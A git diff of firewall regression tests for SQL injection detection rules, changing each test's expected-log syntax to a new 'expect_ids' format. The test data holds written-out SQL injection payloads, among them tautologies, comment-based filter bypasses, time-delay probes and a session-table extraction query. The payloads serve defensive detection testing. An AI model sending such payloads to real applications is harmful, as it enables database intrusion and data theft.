@@ -642,7 +681,8 @@ tests: data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 41 desc: "SQL Injection Attack" stages: @@ -658,7 +698,8 @@ tests: data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 42 desc: "SQL Injection Attack" stages: @@ -674,7 +715,8 @@ tests: data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 43 desc: "SQL Injection Attack" stages: @@ -690,7 +732,8 @@ tests: data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 44 desc: "SQL Injection Attack" stages: @@ -706,7 +749,8 @@ tests: data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: @@ -722,4 +766,5 @@ tests: data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index b90d64dd2..503274696 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml 
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -17,4 +17,5 @@ tests: uri: "/get?var=sdfsd%27or%201%20%3e%201" version: HTTP/1.0 output: - log_contains: id "942390" + log: + expect_ids: [942390] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 31616f078..46b912d71 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -19,7 +19,8 @@ tests: data: "and '5'orig_var_datavarname=whatever" version: HTTP/1.0 output: - log_contains: id "942400" + log: + expect_ids: [942400] - test_id: 2 desc: "SQL Injection Attack - false positive" stages: @@ -36,4 +37,5 @@ tests: data: "and 7 oranges" version: HTTP/1.0 output: - no_log_contains: id "942400" + log: + no_expect_ids: [942400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 83030ad0a..8398d2f7c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -18,7 +18,8 @@ tests: data: "ABS(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "benchmark(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "BENChmARk(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "cast(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 5 desc: "SQL Injection Attack" stages: 
@@ -82,7 +86,8 @@ tests: data: "CAST(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "char(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "chaR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "chr(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 9 desc: "SQL Injection Attack" stages: @@ -146,7 +154,8 @@ tests: data: "CHR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "COALESCE(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 11 desc: "SQL Injection Attack" stages: @@ -178,7 +188,8 @@ tests: data: "Compress (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 12 desc: "SQL Injection Attack" stages: @@ -194,7 +205,8 @@ tests: data: "concat (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 13 desc: "SQL Injection Attack" stages: @@ -210,7 +222,8 @@ tests: data: "cOnCaT(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 14 desc: "SQL Injection Attack" stages: @@ -226,7 +239,8 @@ tests: data: "concat_ws(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 15 desc: "SQL Injection Attack" stages: @@ -242,7 +256,8 @@ tests: data: "convert(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 16 desc: "SQL Injection Attack" stages: 
@@ -258,7 +273,8 @@ tests: data: "cOnVeRt(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 17 desc: "SQL Injection Attack" stages: @@ -274,7 +290,8 @@ tests: data: "COS(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 18 desc: "SQL Injection Attack" stages: @@ -290,7 +307,8 @@ tests: data: "COUNT(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 19 desc: "SQL Injection Attack" stages: @@ -306,7 +324,8 @@ tests: data: "CURRENT_USER(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 20 desc: "SQL Injection Attack" stages: @@ -322,7 +341,8 @@ tests: data: "database (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 21 desc: "SQL Injection Attack" stages: @@ -338,7 +358,8 @@ tests: data: "date(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 22 desc: "SQL Injection Attack" stages: @@ -354,7 +375,8 @@ tests: data: "pay=date%5D%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 23 desc: "SQL Injection Attack" stages: @@ -370,7 +392,8 @@ tests: data: "pay=day.+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 24 desc: "SQL Injection Attack" stages: @@ -386,7 +409,8 @@ tests: data: "pay=day%26%27%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 25 desc: "SQL Injection Attack" stages: @@ -402,7 +426,8 @@ tests: data: "pay=decode%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 26 desc: "SQL Injection Attack" stages: @@ -418,7 +443,8 @@ tests: data: "pay=default%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 27 desc: "SQL Injection Attack" stages: 
@@ -434,7 +460,8 @@ tests: data: "pay=ELT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 28 desc: "SQL Injection Attack" stages: @@ -450,7 +477,8 @@ tests: data: "pay=encode%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 29 desc: "SQL Injection Attack" stages: @@ -466,7 +494,8 @@ tests: data: "pay=ExtractValue%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 30 desc: "SQL Injection Attack" stages: @@ -482,7 +511,8 @@ tests: data: "pay=EXTRACTVALUE%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 31 desc: "SQL Injection Attack" stages: @@ -498,7 +528,8 @@ tests: data: "pay=floor%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 32 desc: "SQL Injection Attack" stages: @@ -514,7 +545,8 @@ tests: data: "pay=FLOOR+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 33 desc: "SQL Injection Attack" stages: @@ -530,7 +562,8 @@ tests: data: "pay=format%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 34 desc: "SQL Injection Attack" stages: @@ -546,7 +579,8 @@ tests: data: "pay=GROUP_CONCAT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 35 desc: "SQL Injection Attack" stages: @@ -562,7 +596,8 @@ tests: data: "pay=hex%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 36 desc: "SQL Injection Attack" stages: @@ -578,7 +613,8 @@ tests: data: "pay=hEx%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 37 desc: "SQL Injection Attack" stages: 
@@ -594,7 +630,8 @@ tests: data: "pay=if+%21%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 38 desc: "SQL Injection Attack" stages: @@ -610,7 +647,8 @@ tests: data: "pay=if+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 39 desc: "SQL Injection Attack" stages: @@ -626,7 +664,8 @@ tests: data: "pay=if%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 40 desc: "SQL Injection Attack" stages: @@ -642,7 +681,8 @@ tests: data: "pay=if%5C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 41 desc: "SQL Injection Attack" stages: @@ -658,7 +698,8 @@ tests: data: "pay=IFNULL%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 42 desc: "SQL Injection Attack" stages: @@ -674,7 +715,8 @@ tests: data: "pay=in+%27%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 43 desc: "SQL Injection Attack" stages: @@ -690,7 +732,8 @@ tests: data: "pay=IN+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 44 desc: "SQL Injection Attack" stages: @@ -706,7 +749,8 @@ tests: data: "pay=IN%2F%2A%2A%2F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 45 desc: "SQL Injection Attack" stages: @@ -722,7 +766,8 @@ tests: data: "pay=insert%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 46 desc: "SQL Injection Attack" stages: @@ -738,7 +783,8 @@ tests: data: "pay=left%27%29%3F%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 47 desc: "SQL Injection Attack" stages: 
@@ -754,7 +800,8 @@ tests: data: "pay=LEFT%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 48 desc: "SQL Injection Attack" stages: @@ -770,7 +817,8 @@ tests: data: "pay=length%7C%7C%21%21%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 49 desc: "SQL Injection Attack" stages: @@ -786,7 +834,8 @@ tests: data: "pay=length%7C%7C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 50 desc: "SQL Injection Attack" stages: @@ -802,7 +851,8 @@ tests: data: "pay=length%3F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 51 desc: "SQL Injection Attack" stages: @@ -818,7 +868,8 @@ tests: data: "pay=length%26%26%21%21%21%24%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 52 desc: "SQL Injection Attack" stages: @@ -834,7 +885,8 @@ tests: data: "pay=length%26%26%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 53 desc: "SQL Injection Attack" stages: @@ -850,7 +902,8 @@ tests: data: "pay=LENGTH%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 54 desc: "SQL Injection Attack" stages: @@ -866,7 +919,8 @@ tests: data: "pay=ln+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 55 desc: "SQL Injection Attack" stages: @@ -882,7 +936,8 @@ tests: data: "pay=ln%29+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 56 desc: "SQL Injection Attack" stages: @@ -898,7 +953,8 @@ tests: data: "pay=load_file%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 57 desc: "SQL Injection Attack" stages: 
@@ -914,7 +970,8 @@ tests: data: "pay=local%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 58 desc: "SQL Injection Attack" stages: @@ -930,7 +987,8 @@ tests: data: "pay=log%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 59 desc: "SQL Injection Attack" stages: @@ -946,7 +1004,8 @@ tests: data: "pay=log%26%26%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 60 desc: "SQL Injection Attack" stages: @@ -962,7 +1021,8 @@ tests: data: "pay=lower%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 61 desc: "SQL Injection Attack" stages: @@ -978,7 +1038,8 @@ tests: data: "pay=MAKE_SET%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 62 desc: "SQL Injection Attack" stages: @@ -994,7 +1055,8 @@ tests: data: "pay=MAX%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 63 desc: "SQL Injection Attack" stages: @@ -1010,7 +1072,8 @@ tests: data: "pay=md5%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 64 desc: "SQL Injection Attack" stages: @@ -1026,7 +1089,8 @@ tests: data: "pay=md5%5C%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 65 desc: "SQL Injection Attack" stages: @@ -1042,7 +1106,8 @@ tests: data: "pay=MID%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 66 desc: "SQL Injection Attack" stages: @@ -1058,7 +1123,8 @@ tests: data: "pay=minute+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 67 desc: "SQL Injection Attack" stages: 
@@ -1074,7 +1140,8 @@ tests: data: "pay=month%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 68 desc: "SQL Injection Attack" stages: @@ -1090,7 +1157,8 @@ tests: data: "name_const(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 69 desc: "SQL Injection Attack" stages: @@ -1106,7 +1174,8 @@ tests: data: "now(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 70 desc: "SQL Injection Attack" stages: @@ -1122,7 +1191,8 @@ tests: data: "nOW(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 71 desc: "SQL Injection Attack" stages: @@ -1138,7 +1208,8 @@ tests: data: "ord(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 72 desc: "SQL Injection Attack" stages: @@ -1154,7 +1225,8 @@ tests: data: "password?(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 73 desc: "SQL Injection Attack" stages: @@ -1170,7 +1242,8 @@ tests: data: "password/?(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 74 desc: "SQL Injection Attack" stages: @@ -1186,7 +1259,8 @@ tests: data: "Password>$(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 75 desc: "SQL Injection Attack" stages: @@ -1202,7 +1276,8 @@ tests: data: "pg_sleep(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 76 desc: "SQL Injection Attack" stages: @@ -1218,7 +1293,8 @@ tests: data: "pi(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 77 desc: "SQL Injection Attack" stages: @@ -1234,7 +1310,8 @@ tests: data: "PI(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 78 desc: "SQL Injection Attack" stages: 
@@ -1250,7 +1327,8 @@ tests: data: "pow(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 79 desc: "SQL Injection Attack" stages: @@ -1266,7 +1344,8 @@ tests: data: "POW(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 80 desc: "SQL Injection Attack" stages: @@ -1282,7 +1361,8 @@ tests: data: "quarter. (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 81 desc: "SQL Injection Attack" stages: @@ -1298,7 +1378,8 @@ tests: data: "rand(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 82 desc: "SQL Injection Attack" stages: @@ -1314,7 +1395,8 @@ tests: data: "Rand (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 83 desc: "SQL Injection Attack" stages: @@ -1330,7 +1412,8 @@ tests: data: "RAND(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 84 desc: "SQL Injection Attack" stages: @@ -1346,7 +1429,8 @@ tests: data: "replace(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 85 desc: "SQL Injection Attack" stages: @@ -1362,7 +1446,8 @@ tests: data: "REPLACE(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 86 desc: "SQL Injection Attack" stages: @@ -1378,7 +1463,8 @@ tests: data: "round (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 87 desc: "SQL Injection Attack" stages: @@ -1394,7 +1480,8 @@ tests: data: "round(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 88 desc: "SQL Injection Attack" stages: @@ -1410,7 +1497,8 @@ tests: data: "rtrim(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 89 desc: "SQL Injection Attack" stages: 
@@ -1426,7 +1514,8 @@ tests: data: "RTRIM(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 90 desc: "SQL Injection Attack" stages: @@ -1442,7 +1531,8 @@ tests: data: "pay=sin (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 91 desc: "SQL Injection Attack" stages: @@ -1458,7 +1548,8 @@ tests: data: "SIN(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 92 desc: "SQL Injection Attack" stages: @@ -1474,7 +1565,8 @@ tests: data: "pay=sleep(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 93 desc: "SQL Injection Attack" stages: @@ -1490,7 +1582,8 @@ tests: data: "SLEEP (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 94 desc: "SQL Injection Attack" stages: @@ -1506,7 +1599,8 @@ tests: data: "pay=strcmp(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 95 desc: "SQL Injection Attack" stages: @@ -1522,7 +1616,8 @@ tests: data: "pay=substr(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 96 desc: "SQL Injection Attack" stages: @@ -1538,7 +1633,8 @@ tests: data: "SUBSTR(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 97 desc: "SQL Injection Attack" stages: @@ -1554,7 +1650,8 @@ tests: data: "pay=substring(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 98 desc: "SQL Injection Attack" stages: @@ -1570,7 +1667,8 @@ tests: data: "SUBSTRING(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 99 desc: "SQL Injection Attack" stages: 
@@ -1586,7 +1684,8 @@ tests: data: "pay=sysdate(" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 100 desc: "SQL Injection Attack" stages: @@ -1602,7 +1701,8 @@ tests: data: "time (" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 101 desc: "SQL Injection Attack" stages: @@ -1618,7 +1718,8 @@ tests: data: "pay=time%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 102 desc: "SQL Injection Attack" stages: @@ -1634,7 +1735,8 @@ tests: data: "pay=trim%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 103 desc: "SQL Injection Attack" stages: @@ -1650,7 +1752,8 @@ tests: data: "pay=Uncompress+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 104 desc: "SQL Injection Attack" stages: @@ -1666,7 +1769,8 @@ tests: data: "pay=unhex%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 105 desc: "SQL Injection Attack" stages: @@ -1682,7 +1786,8 @@ tests: data: "pay=uNhEx%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 106 desc: "SQL Injection Attack" stages: @@ -1698,7 +1803,8 @@ tests: data: "pay=updatexml%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 107 desc: "SQL Injection Attack" stages: @@ -1714,7 +1820,8 @@ tests: data: "pay=UpdateXML%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 108 desc: "SQL Injection Attack" stages: @@ -1730,7 +1837,8 @@ tests: data: "pay=UPPER%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 109 desc: "SQL Injection Attack" stages: 
@@ -1746,7 +1854,8 @@ tests: data: "pay=user+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 110 desc: "SQL Injection Attack" stages: @@ -1762,7 +1871,8 @@ tests: data: "pay=user%2F%3F%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 111 desc: "SQL Injection Attack" stages: @@ -1778,7 +1888,8 @@ tests: data: "pay=user%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 112 desc: "SQL Injection Attack" stages: @@ -1794,7 +1905,8 @@ tests: data: "pay=values+%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 113 desc: "SQL Injection Attack" stages: @@ -1810,7 +1922,8 @@ tests: data: "pay=VALUES%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 114 desc: "SQL Injection Attack" stages: @@ -1826,7 +1939,8 @@ tests: data: "pay=version%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 115 desc: "SQL Injection Attack" stages: @@ -1842,7 +1956,8 @@ tests: data: "pay=version%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 116 desc: "SQL Injection Attack" stages: @@ -1858,7 +1973,8 @@ tests: data: "pay=xmltype%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 117 desc: "SQL Injection Attack" stages: @@ -1874,7 +1990,8 @@ tests: data: "pay=XMLType%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] - test_id: 118 desc: "SQL Injection Attack" stages: @@ -1890,4 +2007,5 @@ tests: data: "pay=year%5D%3D%28" version: HTTP/1.0 output: - log_contains: id "942410" + log: + expect_ids: [942410] 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index ef14db340..865399199 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -18,4 +18,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "942420" + log: + expect_ids: [942420] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 7446ef615..22dc08ea6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -18,4 +18,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942421" + log: + expect_ids: [942421] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index 53bc53f74..c0dd5a946 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -18,4 +18,5 @@ tests: data: "var=(((((())))))&var2=whatever" version: HTTP/1.0 output: - log_contains: id "942430" + log: + expect_ids: [942430] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fcf159aed..fd9cea392 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -18,4 +18,5 @@ tests: data: "var=-------------------&var2=whatever" version: HTTP/1.0 output: - log_contains: id "942431" + log: + expect_ids: [942431] 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index be29ba911..b43434dea 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -18,4 +18,5 @@ tests: data: "var=;;dd foo bar" version: HTTP/1.0 output: - log_contains: id "942432" + log: + expect_ids: [942432] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index ac44eecc4..7ce8e3c34 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=DROP%20sampletable%3b--" version: HTTP/1.0 output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 2 desc: "SQL Comment Sequence" stages: @@ -33,7 +34,8 @@ tests: uri: "/post" data: "test=' or 1=1;%00" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 3 desc: "SQL Comment Sequence" stages: @@ -49,7 +51,8 @@ tests: uri: "/post" data: "test=OR 1# " output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 4 desc: "SQL Comment Sequence" stages: @@ -65,7 +68,8 @@ tests: uri: "/post" data: "test=admin'--" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 5 desc: "SQL Comment Sequence" stages: @@ -81,7 +85,8 @@ tests: uri: "/post" data: "test=DROP/*comment*/sampletable" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 6 desc: "SQL Comment Sequence" stages: @@ -97,7 +102,8 @@ tests: uri: "/post" data: "test=DR/**/OP/*bypass deny listing*/sampletable" output: - log_contains: id "942440" + log: + 